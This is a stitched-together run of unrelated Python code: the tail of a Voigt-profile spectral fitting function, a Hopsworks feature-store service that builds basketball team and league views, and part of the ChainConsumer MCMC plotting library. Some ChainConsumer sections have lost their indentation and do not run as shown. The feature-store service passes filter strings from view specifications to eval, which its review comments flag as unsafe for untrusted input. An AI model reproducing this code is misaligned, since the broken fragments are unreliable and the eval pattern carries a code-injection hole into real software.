        elif self.__typeCont == 'powerLaw':
            # FIX: was ``math.log10`` (``math`` not imported) -> np.log10.
            k = np.log10(self.__voigtDict['left'][1]/self.__voigtDict['right'][1])/np.log10(self.__voigtDict['left'][0]/self.__voigtDict['right'][0])
            A_pow = self.__voigtDict['left'][1]/(self.__voigtDict['left'][0]**k)
            powerLaw = Model(powerLaw_fitting_function, name= 'continuum_fitting_function')
            voigt_model = voigt + powerLaw
            params = voigt_model.make_params(A = A,
                                             c = c,
                                             sigma=sigma,
                                             gamma = gamma,
                                             A_pow=A_pow,
                                             k=k)
            init = voigt_model.eval(params, x=wavelengthValues)
            result = voigt_model.fit(fluxValues, params, x=wavelengthValues)
            # Update table of results parameters.
            resultText = "Path: {}".format(path)
            resultText = resultText + "\n" + \
                "z: (x - {} + i*{})/(sigma * sqrt(2)".format(str(result.params['c'].value), str(result.params['gamma'].value))
            resultText = resultText + "\n" + \
                "Voigt model: ({} * Re[e**(-z**2)*erfc(-i*z)])/({} * sqrt(2*pi))".format(str(result.params['A'].value), str(result.params['sigma'].value))
            resultText = resultText + "\n" + "Power law model: {} * x**{}".format(str(result.params['A_pow'].value), str(result.params['k'].value))
            resultText = resultText + "\n" + "Voigt integrated flux : "+ " = " + str(integrated_flux(result.params['A'].value, result.params['sigma'].value, 'voigt'))
            voigtFitResultList = [key + " = " + str(result.params[key].value) for key in result.params]
            for resultParams in voigtFitResultList:
                resultText = resultText + "\n" + resultParams
            resultText = resultText + "\n" + "Chi-square" + " = " + str(result.chisqr)
            return result, resultText, wavelengthValues, fluxValues, initial_y_values, None
/Hopsworks_Integration-0.0.2-py3-none-any.whl/src/service/ComplexFeatureService.py | import hsfs.constructor.query
import logging
import pandas as pd
from hsfs.feature import Feature
import json
import sys
import os
# HACK: make the project root importable when running from a subdirectory.
parent_dir = os.path.dirname(os.getcwd())
sys.path.insert(0,parent_dir)
from src.service import FeatureStoreService as fss
from src.utils import multi_melt as melt
# Module-wide logger; note it uses the literal name 'logger', not __name__.
logger = logging.getLogger('logger')
class ComplexFeatureService:
    """Builds Hopsworks feature views by joining feature groups.

    Each ``build_view_*`` method assembles an HSFS query from one or more
    feature groups and registers the result as a feature view through
    FeatureStoreService.  Errors are logged and swallowed (best-effort),
    in which case the method returns None.
    """

    def __init__(self, config):
        """Remember the config-file path; parse it once to fail fast on bad JSON."""
        self.conf = config
        with open(self.conf, "r") as jsonfile:
            # Parsed only for validation; the value itself is unused here.
            json.load(jsonfile)

    def build_view_team(self):
        """Build the per-team query: join box score, advanced stats and
        game base, unpivot T1/T2 columns into one row per team, and return
        a query over a temporary feature group.
        """
        try:
            logger.info('Getting feature groups details')
            features_game_base = ["uuid", "League", "Date", "Team1", "Team2", "Season", "G_Type", "T1_loc", "T2_loc",
                                  "T1_sea_g_played", "T1_sea_g_played_h", "T1_sea_g_played_a", "T2_sea_g_played",
                                  "T2_sea_g_played_h", "T2_sea_g_played_a", "T1_B2B", "T2_B2B"]
            features_box_score = ["T1_pts", "T2_pts", "T1_Result", "T2_Result", "Box_Type", "MP", "T1_FGM", "T1_FGA",
                                  "T1_FG_Pct", "T1_2PM", "T1_2PA", "T1_2P_Pct", "T1_3PM", "T1_3PA", "T1_3P_Pct",
                                  "T1_FTM", "T1_FTA", "T1_FT_Pct", "T1_OREB", "T1_DREB", "T1_REB", "T1_AST", "T1_TOV",
                                  "T1_STL", "T1_BLK", "T1_PF", "T2_FGM", "T2_FGA", "T2_FG_Pct", "T2_2PM", "T2_2PA",
                                  "T2_2P_Pct", "T2_3PM", "T2_3PA", "T2_3P_Pct", "T2_FTM", "T2_FTA", "T2_FT_Pct",
                                  "T2_OREB", "T2_DREB", "T2_REB", "T2_AST", "T2_TOV", "T2_STL", "T2_BLK", "T2_PF",
                                  "PD_Box", "PT_Box"]
            features_adv_stats = ["T1_Poss_Cnt", "T1_Poss_Sec", "T1_Poss_Sdp", "Box_Type", "T1_FGA_Poss_Prop",
                                  "T1_2PA_Poss_Prop", "T1_3PA_Poss_Prop", "T1_FTA_Poss_Prop", "T1_FTA_FGA_Rto",
                                  "T1_EFG_Pct", "T1_TS_Pct", "T1_OREB_REB_Pct", "T1_DREB_REB_Pct", "T1_TOV_Poss_Pct",
                                  "T1_PF_Poss_Pct", "T2_Poss_Cnt", "T2_Poss_Sec", "T2_Poss_Sdp", "T2_FGA_Poss_Prop",
                                  "T2_2PA_Poss_Prop", "T2_3PA_Poss_Prop", "T2_FTA_Poss_Prop", "T2_FTA_FGA_Rto",
                                  "T2_EFG_Pct", "T2_TS_Pct", "T2_OREB_REB_Pct", "T2_DREB_REB_Pct", "T2_TOV_Poss_Pct",
                                  "T2_PF_Poss_Pct", "PD_Poss", "PT_Poss"]
            fss_obj = fss.FeatureStoreService(self.conf)
            fg_game_base = fss_obj.get_group(
                "gp_game_base",
                2
            )
            fg_box_score = fss_obj.get_group(
                "gp_box_score",
                1
            )
            fg_adv_stats = fss_obj.get_group(
                "gp_adv_stats",
                1
            )
            # NOTE(review): uuid is hard-coded to 6568 -- presumably a
            # development/debug restriction; confirm before production use.
            df = fg_box_score.select(features_box_score).filter(Feature('uuid') == 6568) \
                .join(fg_adv_stats.select(features_adv_stats).filter(Feature('uuid') == 6568), \
                      on=['uuid', 'box_type'], join_type='inner') \
                .join(fg_game_base.select(features_game_base).filter(Feature('uuid') == 6568), \
                      on=['uuid'], join_type='inner') \
                .read()
            # Point differentials per box score and per possession, from
            # each team's perspective.
            df['t1_pd_box'] = df['t2_pts'] - df['t1_pts']
            df['t2_pd_box'] = df['t1_pts'] - df['t2_pts']
            df['t1_pd_poss'] = (df['t2_pts'] - df['t1_pts']) / (df[['t1_poss_cnt', 't2_poss_cnt']].mean(axis=1))
            df['t2_pd_poss'] = (df['t1_pts'] - df['t2_pts']) / (df[['t1_poss_cnt', 't2_poss_cnt']].mean(axis=1))
            # Unpivot paired T1_/T2_ columns into one row per team: each
            # inner pair becomes one output column (first entry for the
            # T1 row, second for the T2 row).
            id_vars = ['uuid', 'date', 'season', 'box_type', 'g_type', 'mp', 'pt_box', 'pt_poss']
            value_vars = [['Team1', 'Team2'], ['T1_Loc', 'T2_Loc'], ['T1_sea_g_played', 'T2_sea_g_played'],
                          ['T1_B2B', 'T2_B2B'], ['t1_pd_box', 't2_pd_box'], ['t1_pd_poss', 't2_pd_poss'],
                          ['T1_PTS', 'T2_PTS'], ['T1_FGM', 'T2_FGM'], ['T1_FGA', 'T2_FGA'],
                          ['T1_FG_Pct', 'T2_FG_Pct'], ['T1_2PM', 'T2_2PM'], ['T1_2PA', 'T2_2PA'],
                          ['T1_2P_Pct', 'T2_2P_Pct'],
                          ['T1_3PM', 'T2_3PM'], ['T1_3PA', 'T2_3PA'], ['T1_3P_Pct', 'T2_3P_Pct'], ['T1_FTM', 'T2_FTM'],
                          ['T1_FTA', 'T2_FTA'], ['T1_FT_Pct', 'T2_FT_Pct'], ['T1_OREB', 'T2_OREB'],
                          ['T1_DREB', 'T2_DREB'],
                          ['T1_REB', 'T2_REB'], ['T1_AST', 'T2_AST'], ['T1_TOV', 'T2_TOV'], ['T1_STL', 'T2_STL'],
                          ['T1_BLK', 'T2_BLK'],
                          ['T1_PF', 'T2_PF'], ['T2_PTS', 'T1_PTS'], ['T2_FGM', 'T1_FGM'], ['T2_FGA', 'T1_FGA'],
                          ['T2_FG_Pct', 'T1_FG_Pct'], ['T2_2PM', 'T1_2PM'], ['T2_2PA', 'T1_2PA'],
                          ['T2_2P_Pct', 'T1_2P_Pct'],
                          ['T2_3PM', 'T1_3PM'], ['T2_3PA', 'T1_3PA'], ['T2_3P_Pct', 'T1_3P_Pct'], ['T2_FTM', 'T1_FTM'],
                          ['T2_FTA', 'T1_FTA'], ['T2_FT_Pct', 'T1_FT_Pct'], ['T2_OREB', 'T1_OREB'],
                          ['T2_DREB', 'T1_DREB'],
                          ['T2_REB', 'T1_REB'], ['T2_AST', 'T1_AST'], ['T2_TOV', 'T1_TOV'], ['T2_STL', 'T1_STL'],
                          ['T2_BLK', 'T1_BLK'],
                          ['T2_PF', 'T1_PF'], ['T1_Poss_Cnt', 'T2_Poss_Cnt'], ['T1_Poss_Sec', 'T2_Poss_Sec'],
                          ['T1_Poss_Sdp', 'T2_Poss_Sdp'], ['T1_FGA_Poss_Prop', 'T2_FGA_Poss_Prop'],
                          ['T1_2PA_Poss_Prop', 'T2_2PA_Poss_Prop'], ['T1_3PA_Poss_Prop', 'T2_3PA_Poss_Prop'],
                          ['T1_FTA_Poss_Prop', 'T2_FTA_Poss_Prop'], ['T1_FTA_FGA_Rto', 'T2_FTA_FGA_Rto'],
                          ['T1_EFG_Pct', 'T2_EFG_Pct'],
                          ['T1_TS_Pct', 'T2_TS_Pct'], ['T1_OREB_REB_Pct', 'T2_OREB_REB_Pct'],
                          ['T1_DREB_REB_Pct', 'T2_DREB_REB_Pct'],
                          ['T1_TOV_Poss_Pct', 'T2_TOV_Poss_Pct'], ['T1_PF_Poss_Pct', 'T2_PF_Poss_Pct'],
                          ['T2_Poss_Cnt', 'T1_Poss_Cnt'],
                          ['T2_Poss_Sec', 'T1_Poss_Sec'], ['T2_Poss_Sdp', 'T1_Poss_Sdp'],
                          ['T2_FGA_Poss_Prop', 'T1_FGA_Poss_Prop'],
                          ['T2_2PA_Poss_Prop', 'T1_2PA_Poss_Prop'], ['T2_3PA_Poss_Prop', 'T1_3PA_Poss_Prop'],
                          ['T2_FTA_Poss_Prop', 'T1_FTA_Poss_Prop'], ['T2_FTA_FGA_Rto', 'T1_FTA_FGA_Rto'],
                          ['T2_EFG_Pct', 'T1_EFG_Pct'],
                          ['T2_TS_Pct', 'T1_TS_Pct'], ['T2_OREB_REB_Pct', 'T1_OREB_REB_Pct'],
                          ['T2_DREB_REB_Pct', 'T1_DREB_REB_Pct'],
                          ['T2_TOV_Poss_Pct', 'T1_TOV_Poss_Pct'], ['T2_PF_Poss_Pct', 'T1_PF_Poss_Pct']]
            value_name = ['Team', 'Team_Loc', 'Team_sea_g_played', 'Team_B2B', 'PD_Box', 'PD_Poss', 'Off_PTS',
                          'Off_FGM',
                          'Off_FGA', 'Off_FG_Pct', 'Off_2PM', 'Off_2PA', 'Off_2P_Pct', 'Off_3PM', 'Off_3PA',
                          'Off_3P_Pct',
                          'Off_FTM', 'Off_FTA', 'Off_FT_Pct', 'Off_OREB', 'Off_DREB', 'Off_REB', 'Off_AST', 'Off_TOV',
                          'Off_STL', 'Off_BLK', 'Off_PF', 'Def_PTS', 'Def_FGM',
                          'Def_FGA', 'Def_FG_Pct', 'Def_2PM', 'Def_2PA', 'Def_2P_Pct', 'Def_3PM', 'Def_3PA',
                          'Def_3P_Pct',
                          'Def_FTM', 'Def_FTA', 'Def_FT_Pct', 'Def_OREB', 'Def_DREB', 'Def_REB', 'Def_AST', 'Def_TOV',
                          'Def_STL', 'Def_BLK', 'Def_PF', 'Off_Poss_Cnt', 'Off_Poss_Sec', 'Off_Poss_Sdp',
                          'Off_FGA_Poss_Prop',
                          'Off_2PA_Poss_Prop', 'Off_3PA_Poss_Prop', 'Off_FTA_Poss_Prop', 'Off_FTA_FGA_Rto',
                          'Off_EFG_Pct',
                          'Off_TS_Pct', 'Off_OREB_REB_Pct', 'Off_DREB_REB_Pct', 'Off_TOV_Poss_Pct', 'Off_PF_Poss_Pct',
                          'Def_Poss_Cnt', 'Def_Poss_Sec', 'Def_Poss_Sdp', 'Def_FGA_Poss_Prop', 'Def_2PA_Poss_Prop',
                          'Def_3PA_Poss_Prop', 'Def_FTA_Poss_Prop', 'Def_FTA_FGA_Rto', 'Def_EFG_Pct', 'Def_TS_Pct',
                          'Def_OREB_REB_Pct', 'Def_DREB_REB_Pct', 'Def_TOV_Poss_Pct', 'Def_PF_Poss_Pct']
            # FIX: removed an unused lower-cased copy of value_vars that was
            # computed here and never read.
            df_melted = melt.call_multi_melt(df,
                                             [x.lower() for x in id_vars],
                                             [[x.lower() for x in sub_value_vars] for sub_value_vars in value_vars],
                                             [x.lower() for x in value_name]).drop(columns=['variable'])
            # NOTE(review): these pandas options are process-global side
            # effects (display settings for the debug print below).
            pd.set_option('display.max_columns', None)
            pd.set_option('display.width', 1000)
            final_df = df_melted[
                ['uuid', 'date', 'season', 'g_type', 'team', 'team_loc', 'team_sea_g_played', 'team_b2b', 'mp',
                 'box_type', 'pd_box', 'pt_box', 'off_pts', 'off_fgm', 'off_fga', 'off_fg_pct', 'off_2pm', 'off_2pa',
                 'off_2p_pct', 'off_3pm', 'off_3pa', 'off_3p_pct', 'off_ftm', 'off_fta', 'off_ft_pct', 'off_oreb',
                 'off_dreb', 'off_reb', 'off_ast', 'off_tov', 'off_stl', 'off_blk', 'off_pf', 'def_pts', 'def_fgm',
                 'def_fga', 'def_fg_pct', 'def_2pm', 'def_2pa', 'def_2p_pct', 'def_3pm', 'def_3pa', 'def_3p_pct',
                 'def_ftm', 'def_fta', 'def_ft_pct', 'def_oreb', 'def_dreb', 'def_reb', 'def_ast', 'def_tov',
                 'def_stl', 'def_blk', 'def_pf', 'pd_poss', 'pt_poss', 'off_poss_cnt', 'off_poss_sec', 'off_poss_sdp',
                 'off_fga_poss_prop', 'off_2pa_poss_prop', 'off_3pa_poss_prop', 'off_fta_poss_prop',
                 'off_fta_fga_rto', 'off_efg_pct', 'off_ts_pct', 'off_oreb_reb_pct', 'off_dreb_reb_pct',
                 'off_tov_poss_pct', 'off_pf_poss_pct', 'def_poss_cnt', 'def_poss_sec', 'def_poss_sdp',
                 'def_fga_poss_prop', 'def_2pa_poss_prop', 'def_3pa_poss_prop', 'def_fta_poss_prop',
                 'def_fta_fga_rto', 'def_efg_pct', 'def_ts_pct', 'def_oreb_reb_pct', 'def_dreb_reb_pct',
                 'def_tov_poss_pct', 'def_pf_poss_pct']]
            final_df.sort_values(by=['uuid', 'box_type'], inplace=True)
            # Debug output of the key differential columns.
            filtered_df = final_df[['uuid', 'team', 'box_type', 'pd_box', 'pt_box', 'pd_poss', 'pt_poss']]
            print(filtered_df)
            # Materialize a temporary group just to obtain a selectable
            # query, then drop it again.
            fss_obj.build_group('temp_group',
                                1,
                                "temporary feature group",
                                ['uuid', 'date', 'season', 'box_type', 'team'],
                                [],
                                final_df.columns.tolist(),
                                final_df)
            fg_temp = fss_obj.get_group('temp_group', 1)
            query = fg_temp.select_all()
            fss_obj.drop_group('temp_group', 1)
            return query
        except Exception as e:
            # Best-effort: log and fall through (returns None).
            logger.error(e)
        finally:
            pass

    def build_view_t1vst2(self, view_name, view_version, description, view_json):
        """Assemble the t1-vs-t2 join query described by ``view_json``.

        SECURITY NOTE(review): filters and the query are assembled as
        Python source strings and passed to ``eval``; only trusted view
        specifications must reach this method.
        """
        try:
            logger.info('Getting feature groups details')
            # Placeholder so the name exists before the first join.
            query = hsfs.constructor.query.Query
            for groups in view_json:
                name = groups["name"]
                version = groups["version"]
                features = groups["features"]
                join_sequence = groups["join_sequence"]
                joining_columns = groups["joining_columns"]
                join_type = groups["join_type"]
                fss_obj = fss.FeatureStoreService(self.conf)
                fg_name = fss_obj.get_group(
                    name,
                    version
                )
                filters = ""
                # FIX: the original gated on
                # ``groups["filters"] is not str.strip("")`` -- an identity
                # comparison against a fresh empty string, which is True
                # for nearly any value (including blank filters) and broke
                # the "no filter" case.  Gate on non-blank content instead.
                if join_sequence == 1:
                    if groups["filters"].strip():
                        filters = ".filter(" + groups["filters"] + ")"
                    q = "fg_name.select([" + "'{}'".format("','".join(features)) + "])" + filters
                    query = eval(q)
                else:
                    if groups["filters"].strip():
                        filters = ".filter(" + groups["filters"] + ")"
                    q = "query.join(fg_name.select([" + "'{}'".format(
                        "','".join(features)) + "])" + filters + ",on=[" + "'{}'".format(
                        "','".join(joining_columns)) + "],join_type='" + join_type + "')"
                    query = eval(q)
            # FIX: removed unused ``str_query = query.to_string()``.
            return query
        except Exception as e:
            # Best-effort: log and fall through (returns None).
            logger.error(e)
        finally:
            pass

    def build_view_league(self, main_feature_group, secondary_feature_groups, view_name, view_version, labels,
                          description):
        """Build and register a league view: one main group joined with
        each secondary group per its join spec.

        SECURITY NOTE(review): filter expressions are ``eval``-ed; only
        trusted specifications must reach this method.
        """
        try:
            logger.info('Getting feature groups details')
            fss_obj = fss.FeatureStoreService(self.conf)
            main_feature_group_handle = fss_obj.get_group(main_feature_group["name"], main_feature_group["version"])
            if len(main_feature_group["filters"]) > 0:
                main_feature_group_handle = main_feature_group_handle.filter(eval(main_feature_group["filters"]))
            query = "main_feature_group_handle.select(main_feature_group['features'])"
            for group in secondary_feature_groups:
                name = group["name"]
                version = group["version"]
                secondary_feature_group_handle = fss_obj.get_group(name, version)
                if len(group["filters"]) > 0:
                    secondary_feature_group_handle = secondary_feature_group_handle.filter(eval(group["filters"]))
                # NOTE(review): only the *last* secondary handle survives the
                # loop, yet the eval'ed string below references the loop
                # variables -- this only works for a single secondary group;
                # confirm intended behavior for multiple groups.
                query = query + ".join(secondary_feature_group_handle.select(group['features']), \
                                 on=main_feature_group['joining_column']==group['joining_column'], \
                                 join_type=group['join_type'])"
            query_string = eval(query)
            fss_obj.build_view(view_name, view_version, description, "", query_string)
        except Exception as e:
            # Best-effort: log and fall through (returns None).
            logger.error(e)
        finally:
            pass

    def build_view(self, view_name, view_version, description, view_json):
        """Dispatch on view_name to the matching builder and register the view."""
        try:
            cfs_obj = ComplexFeatureService(self.conf)
            if (view_name == 'team'):
                ##TODO: Implement logic for team view
                pass
                # query = cfs_obj.build_view_team()
                # fss_obj = fss.FeatureStoreService(self.conf)
                # fss_obj.build_view(view_name, view_version, description, "", query)
            elif (view_name == 'league'):
                ##TODO: Implement logic for league view
                pass
                # query = cfs_obj.build_view_league(view_name, view_version, description, view_json)
                # fss_obj = fss.FeatureStoreService(self.conf)
                # fss_obj.build_view(view_name, view_version, description, "", query)
            elif (view_name == 't1vst2'):
                query = cfs_obj.build_view_t1vst2(view_name, view_version, description, view_json)
                fss_obj = fss.FeatureStoreService(self.conf)
                fss_obj.build_view(view_name, view_version, description, "", query)
            else:
                logger.error('Feature view function not found. Please implement the function in '
                             'ComplexFeatureService class.')
        except Exception as e:
            # Best-effort: log and fall through (returns None).
            logger.error(e)
        finally:
            pass
import numpy as np
import pandas as pd
import logging
from .comparisons import Comparison
from .diagnostic import Diagnostic
from .plotter import Plotter
from .helpers import get_bins
from .analysis import Analysis
from .colors import Colors
from .chain import Chain
__all__ = ["ChainConsumer"]
class ChainConsumer(object):
""" A class for consuming chains produced by an MCMC walk. Or grid searches. To make plots,
figures, tables, diagnostics, you name it.
"""
__version__ = "0.34.0"
def __init__(self):
logging.basicConfig(level=logging.INFO)
self._logger = logging.getLogger("chainconsumer")
self.color_finder = Colors()
self._all_colours = self.color_finder.get_default()
self._cmaps = ["viridis", "inferno", "hot", "Blues", "Greens", "Greys"]
self._linestyles = ["-", "--", ":"]
self.chains = []
self._all_parameters = []
self._default_parameters = None
self._init_params()
self._gauss_mode = "reflect"
self._configured = False
self._num_configure_calls = 0
self.plotter = Plotter(self)
self.diagnostic = Diagnostic(self)
self.comparison = Comparison(self)
self.analysis = Analysis(self)
def _init_params(self):
self.config = {}
self.config_truth = {}
self._configured = False
self._configured_truth = False
def get_mcmc_chains(self):
return [c for c in self.chains if c.mcmc_chain]
    def add_chain(
        self,
        chain,
        parameters=None,
        name=None,
        weights=None,
        posterior=None,
        walkers=None,
        grid=False,
        num_eff_data_points=None,
        num_free_params=None,
        color=None,
        linewidth=None,
        linestyle=None,
        kde=None,
        shade=None,
        shade_alpha=None,
        power=None,
        marker_style=None,
        marker_size=None,
        marker_alpha=None,
        plot_contour=None,
        plot_point=None,
        show_as_1d_prior=None,
        statistics=None,
        cloud=None,
        shade_gradient=None,
        bar_shade=None,
        bins=None,
        smooth=None,
        color_params=None,
        plot_color_params=None,
        cmap=None,
        num_cloud=None,
        zorder=None,
        shift_params=None,
    ):
        r""" Add a chain to the consumer.

        Parameters
        ----------
        chain : str|ndarray|dict|pandas.DataFrame
            The chain to load. Normally a ``numpy.ndarray``. If a string is found, it
            interprets the string as a filename and attempts to load it in using pandas.read_csv
            (or numpy.load for a ``.npy`` file). If a ``dict``
            is passed in, it assumes the dict has keys of parameter names and values of
            an array of samples. Notice that using a dictionary puts the order of
            parameters in the output under the control of the python ``dict.keys()`` function.
            If ``grid`` is set, you can pass in the parameter ranges in list form. If you pass
            a DataFrame, I will look for a "weight" and "posterior" column by default. If they are
            called something different, extract them and pass them directly into weights and posterior.
        parameters : list[str], optional
            A list of parameter names, one for each column (dimension) in the chain. This parameter
            should remain ``None`` if a dictionary is given as ``chain``, as the parameter names
            are taken from the dictionary keys.
        name : str, optional
            The name of the chain. Used when plotting multiple chains at once.
        weights : ndarray, optional
            If given, uses this array to weight the samples in chain
        posterior : ndarray, optional
            If given, records the log posterior for each sample in the chain
        walkers : int, optional
            How many walkers went into creating the chain. Each walker should
            contribute the same number of steps, and should appear in contiguous
            blocks in the final chain.
        grid : boolean, optional
            Whether the input is a flattened chain from a grid search instead of a Monte-Carlo
            chains. Note that when this is set, `walkers` should not be set, and `weights` should
            be set to the posterior evaluation for the grid point. **Be careful** when using
            a coarse grid of setting a high smoothing value, as this may oversmooth the posterior
            surface and give unreasonably large parameter bounds.
        num_eff_data_points : int|float, optional
            The number of effective (independent) data points used in the model fitting. Not required
            for plotting, but required if loading in multiple chains to perform model comparison.
        num_free_params : int, optional
            The number of degrees of freedom in your model. Not required for plotting, but required if
            loading in multiple chains to perform model comparison.
        color : str(hex), optional
            Provide a colour for the chain. Can be used instead of calling `configure` for convenience.
        linewidth : float, optional
            Provide a line width to plot the contours. Can be used instead of calling `configure` for convenience.
        linestyle : str, optional
            Provide a line style to plot the contour. Can be used instead of calling `configure` for convenience.
        kde : bool|float, optional
            Set the `kde` value for this specific chain. Can be used instead of calling `configure` for convenience.
        shade : bool, optional
            If set, overrides the default behaviour and plots filled contours or not. If a list of
            bools is passed, you can turn shading on or off for specific chains.
        shade_alpha : float, optional
            Filled contour alpha value. Can be used instead of calling `configure` for convenience.
        power : float, optional
            The power to raise the posterior surface to. Useful for inflating or deflating uncertainty for debugging.
        marker_style : str, optional
            The marker style to use when plotting points. Defaults to `'.'`
        marker_size : numeric, optional
            Size of markers, if plotted. Defaults to `20`.
        marker_alpha : numeric, optional
            The alpha values when plotting markers.
        plot_contour : bool, optional
            Whether to plot the whole contour (as opposed to a point). Defaults to true for less than
            25 concurrent chains.
        plot_point : bool, optional
            Whether to plot a maximum likelihood point. Defaults to true for more then 24 chains.
        show_as_1d_prior : bool, optional
            Showing as a 1D prior will show the 1D histograms, but won't plot the 2D contours.
        statistics : string, optional
            Which sort of statistics to use. Defaults to `"max"` for maximum likelihood
            statistics. Other available options are `"mean"`, `"cumulative"`, `"max_symmetric"`,
            `"max_closest"` and `"max_central"`. In the
            very, very rare case you want to enable different statistics for different
            chains, you can pass in a list of strings.
        cloud : bool, optional
            If set, overrides the default behaviour and plots the cloud or not.
        shade_gradient : float, optional
            How much to vary colours in different contour levels.
        bar_shade : bool, optional
            If set to true, shades in confidence regions in under histogram. By default
            this happens if you less than 3 chains, but is disabled if you are comparing
            more chains. You can pass a list if you wish to shade some chains but not others.
        bins : int|float, optional
            The number of bins to use. By default uses :math:`\frac{\sqrt{n}}{10}`, where
            :math:`n` are the number of data points. Giving an integer will set the number
            of bins to the given value. Giving a float will scale the number of bins, such
            that giving ``bins=1.5`` will result in using :math:`\frac{1.5\sqrt{n}}{10}` bins.
            Note this parameter is most useful if `kde=False` is also passed, so you
            can actually see the bins and not a KDE.
        smooth : int, optional
            How much to smooth the marginalised distributions using a gaussian filter.
            Ignored when ``kde`` is enabled; forced to 0 for grid data.
        color_params : str, optional
            The name of the parameter to use for the colour scatter. Defaults to none, for no colour. If set
            to 'weights', 'log_weights', or 'posterior' (without the quotes), and that is not a parameter in the chain,
            it will respectively use the weights, log weights, or posterior, to colour the points.
        plot_color_params : bool, optional
            Whether or not the colour parameter should also be plotted as a posterior surface.
        cmap : str, optional
            The matplotlib colourmap to use in the `colour_param`. If you have multiple `color_param`s, you can
            specific a different cmap for each variable. By default ChainConsumer will cycle between several
            cmaps.
        num_cloud : int, optional
            The number of scatter points to show when enabling `cloud` or setting one of the parameters
            to colour scatter. Defaults to 15k per chain.
        zorder : int, optional
            The zorder to pass to `matplotlib` when plotting to determine visual order in the plot.
        shift_params : dict|list, optional
            Shifts the specified parameters to the given numeric values. Useful to shift contours to the same
            location to perform blinded uncertainty comparisons.

        Returns
        -------
        ChainConsumer
            Itself, to allow chaining calls.
        """
        # --- Normalise the chain input (file path / dict / list / DataFrame) into an ndarray ---
        is_dict = False
        assert chain is not None, "You cannot have a chain of None"
        if isinstance(chain, str):
            if chain.lower().endswith(".npy"):
                chain = np.load(chain)
            else:
                chain = pd.read_csv(chain)
        elif isinstance(chain, dict):
            assert parameters is None, "You cannot pass a dictionary and specify parameter names"
            is_dict = True
            parameters = list(chain.keys())
            chain = np.array([chain[p] for p in parameters]).T
        elif isinstance(chain, list):
            chain = np.array(chain).T
        if isinstance(chain, pd.DataFrame):
            # DataFrames carry their own column names; "weight"/"posterior" columns
            # are extracted into the corresponding arguments.
            assert parameters is None, "You cannot pass a DataFrame and use parameter names, we're using the columns names"
            parameters = list(chain.columns)
            if "weight" in parameters:
                weights = chain["weight"]
            if "posterior" in parameters:
                posterior = chain["posterior"]
            parameters = [p for p in parameters if p not in ["weight", "posterior"]]
            chain = chain[parameters].to_numpy()
        # --- Grid input: expand per-axis values into a full meshgrid of samples ---
        if grid:
            assert walkers is None, "If grid is set, walkers should not be"
            assert weights is not None, "If grid is set, you need to supply weights"
            if len(weights.shape) > 1:
                assert not is_dict, (
                    "We cannot construct a meshgrid from a dictionary, as the parameters" "are no longer ordered. Please pass in a flattened array instead."
                )
                self._logger.info("Constructing meshgrid for grid results")
                meshes = np.meshgrid(*[u for u in chain.T], indexing="ij")
                chain = np.vstack([m.flatten() for m in meshes]).T
                weights = weights.flatten()
                assert weights.size == chain[:, 0].size, "Error, given weight array size disagrees with parameter sampling"

        # A 1D chain is treated as a single-parameter chain (one column).
        if len(chain.shape) == 1:
            chain = chain[None].T

        if name is None:
            name = "Chain %d" % len(self.chains)

        if power is not None:
            assert isinstance(power, int) or isinstance(power, float), "Power should be numeric, but is %s" % type(power)

        # --- Resolve parameter names: remember the first explicit set as the default ---
        if self._default_parameters is None and parameters is not None:
            self._default_parameters = parameters

        if parameters is None:
            if self._default_parameters is not None:
                assert chain.shape[1] == len(self._default_parameters), "Chain has %d dimensions, but default parameters have %d dimensions" % (
                    chain.shape[1],
                    len(self._default_parameters),
                )
                parameters = self._default_parameters
                self._logger.debug("Adding chain using default parameters")
            else:
                self._logger.debug("Adding chain with no parameter names")
                parameters = ["%d" % x for x in range(chain.shape[1])]
        else:
            self._logger.debug("Adding chain with defined parameters")
            assert len(parameters) <= chain.shape[1], "Have only %d columns in chain, but have been given %d parameters names! " "Please double check this." % (
                chain.shape[1],
                len(parameters),
            )
        # Track the union of parameters across all added chains, in first-seen order.
        for p in parameters:
            if p not in self._all_parameters:
                self._all_parameters.append(p)

        # A list of shifts is zipped against the parameter names into a dict.
        if shift_params is not None:
            if isinstance(shift_params, list):
                shift_params = dict([(p, s) for p, s in zip(parameters, shift_params)])
            for key in shift_params.keys():
                if key not in parameters:
                    self._logger.warning("Warning, shift parameter %s is not in list of parameters %s" % (key, parameters))

        # Sorry, no KDE for you on a grid.
        if grid:
            kde = None
        if color is not None:
            color = self.color_finder.get_formatted([color])[0]

        # --- Wrap everything into a Chain object and reset any existing configuration ---
        c = Chain(
            chain,
            parameters,
            name,
            weights=weights,
            posterior=posterior,
            walkers=walkers,
            grid=grid,
            num_free_params=num_free_params,
            num_eff_data_points=num_eff_data_points,
            color=color,
            linewidth=linewidth,
            linestyle=linestyle,
            kde=kde,
            shade_alpha=shade_alpha,
            power=power,
            marker_style=marker_style,
            marker_size=marker_size,
            marker_alpha=marker_alpha,
            plot_contour=plot_contour,
            plot_point=plot_point,
            show_as_1d_prior=show_as_1d_prior,
            statistics=statistics,
            cloud=cloud,
            shade=shade,
            shade_gradient=shade_gradient,
            bar_shade=bar_shade,
            bins=bins,
            smooth=smooth,
            color_params=color_params,
            plot_color_params=plot_color_params,
            cmap=cmap,
            num_cloud=num_cloud,
            zorder=zorder,
            shift_params=shift_params,
        )
        self.chains.append(c)
        self._init_params()
        return self
def add_covariance(self, mean, covariance, parameters=None, name=None, **kwargs):
r""" Generate samples as per mean and covariance supplied. Useful for Fisher matrix forecasts.
Parameters
----------
mean : list|np.ndarray
The an array of mean values.
covariance : list|np.ndarray
The 2D array describing the covariance. Dimensions should agree with the `mean` input.
parameters : list[str], optional
A list of parameter names, one for each column (dimension) in the mean array.
name : str, optional
The name of the chain. Used when plotting multiple chains at once.
kwargs :
Extra arguments about formatting - identical to what you would find in `add_chain`. `linewidth`, `color`,
etc.
Returns
-------
ChainConsumer
Itself, to allow chaining calls.
"""
chain = np.random.multivariate_normal(mean, covariance, size=1000000)
self.add_chain(chain, parameters=parameters, name=name, **kwargs)
self.chains[-1].mcmc_chain = False # So we dont plot this when looking at walks, etc
return self
def add_marker(
self, location, parameters=None, name=None, color=None, marker_size=None, marker_style=None, marker_alpha=None,
):
r""" Add a marker to the plot at the given location.
Parameters
----------
location : list|np.ndarray
The coordinates to place the marker
parameters : list[str], optional
A list of parameter names, one for each column (dimension) in the mean array.
name : str, optional
The name of the chain. Used when plotting multiple chains at once.
color : str(hex), optional
Provide a colour for the chain. Can be used instead of calling `configure` for convenience.
marker_style : str|, optional
The marker style to use when plotting points. Defaults to `'.'`
marker_size : numeric|, optional
Size of markers, if plotted. Defaults to `20`.
